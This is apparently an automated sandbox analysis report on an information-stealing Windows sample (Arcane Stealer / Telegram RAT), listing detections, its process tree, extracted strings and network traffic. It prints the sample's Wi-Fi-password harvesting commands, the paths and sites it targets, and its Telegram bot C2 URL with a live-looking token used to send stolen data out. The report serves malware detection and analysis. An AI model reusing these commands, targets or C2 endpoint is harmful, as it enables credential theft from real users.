Windows Analysis Report
zyEDYRU0jw.exe

Overview

General Information

Sample name: zyEDYRU0jw.exe
Analysis ID: 1576963
MD5: 41d3660b5321768122f4c25ac9868fc3
SHA1: d42e3c5fc24e309581819cba723b14c3c247d824
SHA256: c43a34e78ba6913551af41857fb63a3545acd6a9248e8a4de884988b3ccf895d

Detection

Arcane
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Arcane Stealer
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64native
  • zyEDYRU0jw.exe (PID: 4524 cmdline: "C:\Users\user\Desktop\zyEDYRU0jw.exe" MD5: 41D3660B5321768122F4C25AC9868FC3)
    • cmd.exe (PID: 3452 cmdline: "cmd.exe" /c tasklist MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 7984 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • cmd.exe (PID: 1400 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 2916 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
      • netsh.exe (PID: 5084 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • findstr.exe (PID: 5928 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 8572 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 8632 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
      • taskkill.exe (PID: 8680 cmdline: TaskKill /F /IM 4524 MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 8740 cmdline: Timeout /T 2 /Nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 8760 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 3784 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
ROLLCOAST, Arcane | ROLLCOAST is a ransomware program that encrypts files on logical drives attached to a system. ROLLCOAST is a Dynamic Linked Library (DLL) with no named exports. When observed by Mandiant it uniquely had only one ordinal export 0x01. This suggested the sample was designed to avoid detection and be invoked within memory, possibly through BEACON provided to affiliates. Incident responders working on similar intrusions should capture memory for analysis. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.rollcoast

Malware configuration (Telegram RAT):
{"C2 url": "https://api.telegram.org/bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendMessage"}
Source | Rule | Description | Author
zyEDYRU0jw.exe | JoeSecurity_Arcane | Yara detected Arcane Stealer | Joe Security
zyEDYRU0jw.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
zyEDYRU0jw.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

Source | Rule | Description | Author
00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Arcane | Yara detected Arcane Stealer | Joe Security
00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: zyEDYRU0jw.exe PID: 4524 | JoeSecurity_Arcane | Yara detected Arcane Stealer | Joe Security
(2 further entries collapsed on the original page)

Source | Rule | Description | Author
0.0.zyEDYRU0jw.exe.d30000.0.unpack | JoeSecurity_Arcane | Yara detected Arcane Stealer | Joe Security
0.0.zyEDYRU0jw.exe.d30000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.0.zyEDYRU0jw.exe.d30000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

Stealing of Sensitive Information

Source: Process started | Author: Joe Security | Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\zyEDYRU0jw.exe", ParentImage: C:\Users\user\Desktop\zyEDYRU0jw.exe, ParentProcessId: 4524, ParentProcessName: zyEDYRU0jw.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 1400, ProcessName: cmd.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T19:54:44.188399+0100 | 2039009 | 1 | A Network Trojan was detected | 149.154.167.220 | 443 | 192.168.11.20 | 49757 | TCP
2024-12-17T19:54:43.109091+0100 | 2843856 | 1 | A Network Trojan was detected | 192.168.11.20 | 49757 | 149.154.167.220 | 443 | TCP


AV Detection

Source: zyEDYRU0jw.exe | Avira: detected
Source: zyEDYRU0jw.exe.4524.0.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendMessage"}
Source: zyEDYRU0jw.exe | ReversingLabs: Detection: 63%
Source: Yara match | File source: zyEDYRU0jw.exe, type: SAMPLE
Source: Yara match | File source: 0.0.zyEDYRU0jw.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: zyEDYRU0jw.exe PID: 4524, type: MEMORYSTR
Source: zyEDYRU0jw.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: zyEDYRU0jw.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Xml.ni.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*\~ | source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.000000000725C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS | source: WER8074.tmp.dmp.17.dr
Source: Binary string: Stealer.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Management.pdbz_ | source: WER8074.tmp.dmp.17.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tdata | source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.000000000725C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Malware\Desktop\Arcane\Str\Stealer\Stealer\obj\Release\Stealer.pdb | source: zyEDYRU0jw.exe
Source: Binary string: System.Configuration.ni.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Net.Http.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Security.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: Stealer.pdbMZ | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Configuration.pdbSystem.Core.ni.dll> | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.IO.Compression.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Configuration.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Xml.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Xml.ni.pdbRSDS# | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Core.ni.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Windows.Forms.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: _prod.pdb\* | source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.0000000007232000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Net.Http.ni.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Management.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Drawing.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: mscorlib.ni.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Management.ni.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.pdb4 | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Core.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: mscorlib.ni.pdbRSDS] | source: WER8074.tmp.dmp.17.dr
Source: Binary string: INETCO~1INetCookies_prod.pdb3475e564b17091598996e6f, | source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.00000000071C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.IO.Compression.pdbH | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Net.Http.ni.pdbRSDS | source: WER8074.tmp.dmp.17.dr
Source: Binary string: mscorlib.pdbH | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.ni.pdb | source: WER8074.tmp.dmp.17.dr
Source: Binary string: System.Core.ni.pdbRSDS | source: WER8074.tmp.dmp.17.dr
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File opened: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35\
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Credentials\
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\ClientSidePhishing\25\_metadata\
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\ARM\Reader_21.005.20060\

Networking

Source: Network traffic | Suricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.11.20:49757 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2039009 - Severity 1 - ET MALWARE Win32/SaintStealer CnC Response : 149.154.167.220:443 -> 192.168.11.20:49757
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected:
    POST /bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary="2c67de8b-644a-4406-b045-374572e7377e"
    Host: api.telegram.org
    Content-Length: 120588
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: icanhazip.com
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.16.184.241
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: icanhazip.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: icanhazip.com
    Connection: Keep-Alive
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.000000000348E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",
Source: zyEDYRU0jw.exe | String found in binary or memory: https://mail.ru%https://rambler.ru-https://www.paypal.com#https://yandex.ru equals www.rambler.ru (Rambler)
Source: zyEDYRU0jw.exe | String found in binary or memory: https://mega.nz%https://roblox.com%https://cpanel.net'https://discord.com%https://tiktok.com3https://www.instagram.com%https://twitch.com7https://store.epicgames.com;https://genshin.hoyoverse.com5https://us.shop.battle.net/https://www.booking.com/https://keep.google.com)https://www.ebay.com5https://steamcommunity.com3https://www.microsoft.com#https://yahoo.com'https://www.aol.com1https://www.coinbase.com)https://freebitco.in%https://funpay.com%https://github.com-https://www.icloud.com-https://www.reddit.com equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: icanhazip.com
Source: global traffic | DNS traffic detected: DNS query: 90.168.9.0.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected:
    POST /bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary="2c67de8b-644a-4406-b045-374572e7377e"
    Host: api.telegram.org
    Content-Length: 120588
    Expect: 100-continue
    Connection: Keep-Alive
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000037D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000037D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.orgd
Source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.00000000071C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.00000000071C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: zyEDYRU0jw.exe | String found in binary or memory: http://icanhazip.com
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.com/
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.com/0
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BC97000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0
Source: tmp61E8.tmp.dat.0.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: zyEDYRU0jw.exe | String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000037D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: zyEDYRU0jw.exe | String found in binary or memory: https://api.telegram.org/bot
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000037D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000037D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocumentT
Source: tmp61E8.tmp.dat.0.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: zyEDYRU0jw.exe | String found in binary or memory: https://discord.com%https://tiktok.com3https://www.instagram.com%https://twitch.com7https://store.ep
Source: tmp61E8.tmp.dat.0.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004474000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004456000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.dr, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp61E8.tmp.dat.0.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tmp61E8.tmp.dat.0.dr | String found in binary or memory: https://gemini.google.com/app?q=
Source: zyEDYRU0jw.exe | String found in binary or memory: https://gmail.com
Source: zyEDYRU0jw.exe | String found in binary or memory: https://ipinfo.io/#
Source: tmp61E6.tmp.dat.0.dr | String found in binary or memory: https://login.live.com/
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, tmp61E6.tmp.dat.0.dr | String found in binary or memory: https://login.live.com//
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, tmp61E6.tmp.dat.0.dr | String found in binary or memory: https://login.live.com/https://login.live.com/
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, tmp61E6.tmp.dat.0.dr | String found in binary or memory: https://login.live.com/v104
Source: zyEDYRU0jw.exe | String found in binary or memory: https://mega.nz%https://roblox.com%https://cpanel.net
Source: zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BC97000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: zyEDYRU0jw.exe | String found in binary or memory: https://ozon.ru
Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.000000000348E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004474000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004456000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.dr, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.dr | String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004474000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004456000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.dr, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.dr | String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: zyEDYRU0jw.exe | String found in binary or memory: https://www.aol.com1https://www.coinbase.com)https://freebitco.in%https://funpay.com%https://github.
Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.dr | String found in binary or memory: https://www.ecosia.org/newtab/
Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004417000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004474000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004456000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: zyEDYRU0jw.exe | String found in binary or memory: https://x.com-https://ads.google.com-https://pay.google.com
Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Window created: window name: CLIPBRDWNDCLASS

                        E-Banking Fraud

                        Source: Yara match | File source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara match | File source: 0.0.zyEDYRU0jw.exe.d30000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: zyEDYRU0jw.exe PID: 4524, type: MEMORYSTR
